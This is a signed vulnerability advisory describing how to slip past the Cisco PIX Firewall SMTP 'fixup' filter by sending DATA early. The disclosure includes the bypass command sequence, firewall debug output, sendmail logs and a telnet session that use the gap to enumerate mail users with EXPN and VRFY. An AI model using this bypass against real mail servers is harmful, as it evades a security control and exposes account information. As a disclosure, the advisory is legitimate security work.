-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
How to escape "fixup smtp" of Cisco Pix Firewall:
Cisco Secure PIX Firewall Version 5.2(1)
Compiled on Tue 22-Aug-00 23:35 by bhochuli
pixtest1 up 22 days 5 hours
Hardware: SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB
0: ethernet0: address is 00d0.b790.41a5, irq 11
1: ethernet1: address is 00d0.b790.54d4, irq 10
2: ethernet2: address is 00e0.b601.d289, irq 15
3: ethernet3: address is 00e0.b601.d288, irq 9
4: ethernet4: address is 00e0.b601.d287, irq 11
5: ethernet5: address is 00e0.b601.d286, irq 10
The Pix when a new connection are established use his fixup filter to nullify every command
that aren't in his "allowed list" (such as HELO,MAIL FROM:,RCPT TO:,DATA,RSET,QUIT)
For example, for the "security trought obscurity" concept he rewrite the banner of
the original MTA.
This is a sendmailβ¦
220 ******************************************200000200
Now, pix nullify help command, and if i write a e-mail to my friend asking for ''help'', it should drop
the line on wich i write "help".
So, Cisco Pix Firewall, after "data" command, until "<CR><LF><CR><LF>.<CR><LF>" disable the fixup .
Now what appens if i don't complete the e-mail, or i immediatly type "data" in place of normal
"helo, mail from,rcpt to,data, quit" ?
Pix disable the fixup and give me a direct channel to the MTA without doing content filtering.
Here an example of what i could do exploiting this bug:
helo ciao
mail from: [email protected]
data ( From here pix disable fixup)
expn guest ( Now i could enumerate user
vrfy oracle and have access to all command)
help
whatever command i want
quit
Greeting to Cisco and it's Security Products !
Here log of my testβ¦
=====
The sendmail log:
Sep 19 14:06:19 testbox sendmail[14163]: NOQUEUE: Authentication-Warning: testbox.test.it: [10.10.10.10] didn't use HELO
protocol
Sep 19 14:07:36 testbox sendmail[14164]: NOQUEUE: [10.10.10.10]: expn pinco
Sep 19 14:08:03 testbox sendmail[14165]: NOQUEUE: [10.10.10.10]: vrfy pallino
Sep 19 14:08:50 testbox sendmail[14163]: OAA14163: [email protected], size=0, class=0, pri=0, nrcpts=0,
proto=SMTP, relay=[10.10.10.10]
=====
Here the OutPut of "debug fixup tcp" on the pix:
tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
tcp: SYN out rcvd
tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
tcp: exiting embyonic
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
tcp: TCP MSS changed to 1380
tcp: TCP MSS changed to 1380
tcp: TCP MSS changed to 1380
tcp: TCP MSS changed to 1380
tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: unknown command
smtp: X-ing ciao pix mi vuoi rispondere?
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: help command
smtp: nullify <help> command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: mail command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: data command
smtp: entering data mode
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
Here the telnet session:
naif:~# telnet 10.10.10.2 25
Trying 10.10.10.2β¦
Connected to 10.10.10.2.
Escape character is '^]'.
220 ******************************************200000200
ciao pix mi vuoi rispondere?
500 Command unrecognized: "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"
help
500 Command unrecognized: "XXXX"
mail from: [email protected]
250 [email protected]β¦ Sender ok
data
503 Need RCPT (recipient)
help
214-This is Sendmail version 8.9.1
214-Topics:
214- HELO EHLO MAIL RCPT DATA
214- RSET NOOP QUIT HELP VRFY
214- EXPN VERB ETRN DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214- [email protected].
214-For local information send email to Postmaster at your site.
214 End of HELP info
expn pinco
550 pinco⦠User unknown
vrfy pallino
550 pallino⦠User unknown
The End
Greeting to bolo for the PIX and the BSDI box :)
Kiss to my love NaiL^d0d :****
naif
e-mail:echo "[email protected]" | tr -d \ 'bdghlmoqrsuvwzy'
:pp
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: For info see http://www.gnupg.org
Filter: gpg4pine 4.1 (http://azzie.robotics.net)
iD8DBQE5x5QLdK5I1NnlcMYRAscOAKCv+DvZ3mx4+7UT6LpFyuEQNlD57gCfRJoB
2FEU8a6f1ZhtmDq82pOh3nE=
=0UD1
-----END PGP SIGNATURE-----